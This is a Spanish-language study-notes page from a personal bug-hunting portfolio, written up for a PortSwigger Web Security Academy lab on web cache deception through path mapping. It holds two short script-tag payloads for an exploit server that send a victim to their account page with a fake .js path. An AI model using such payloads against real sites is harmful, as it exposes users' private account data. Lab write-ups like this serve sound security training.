Portfolio Bug Hunter Profile Github

Portfolio Bug Hunter Profile Github

Whoami
Aprender Go
Pentester Lab
Guía de Estudio Hacking
Bug Bounty
PortSwigger WebAcademy
Hacking Certifications
- ACP - APISec University

Powered by GitBook

On this page

PortSwigger WebAcademy

Server Side Topics

Web Cache Deception

Laboratorio: Explotación del mapeo de rutas para el engaño de caché web

PreviousWeb Cache Deception NextLaboratorio: Explotación de delimitadores de ruta para el engaño de caché web (v2)

Last updated 5 months ago

Vemos las respuestas de caché en las respuestas de los encabezados.

Exploit → para poner en el exploit server:

<script>document.location="<https://0ab900e80411d25682437bab004f00f7.web-security-academy.net/my-account/wcd.js>"</script>
<script>document.location="<https://0a1a00d703c2900780dfa35000100083.web-security-academy.net/my-account/ataque/roo.js>"</script>

🧀

WebCacheDeceptionGITBOOK.mov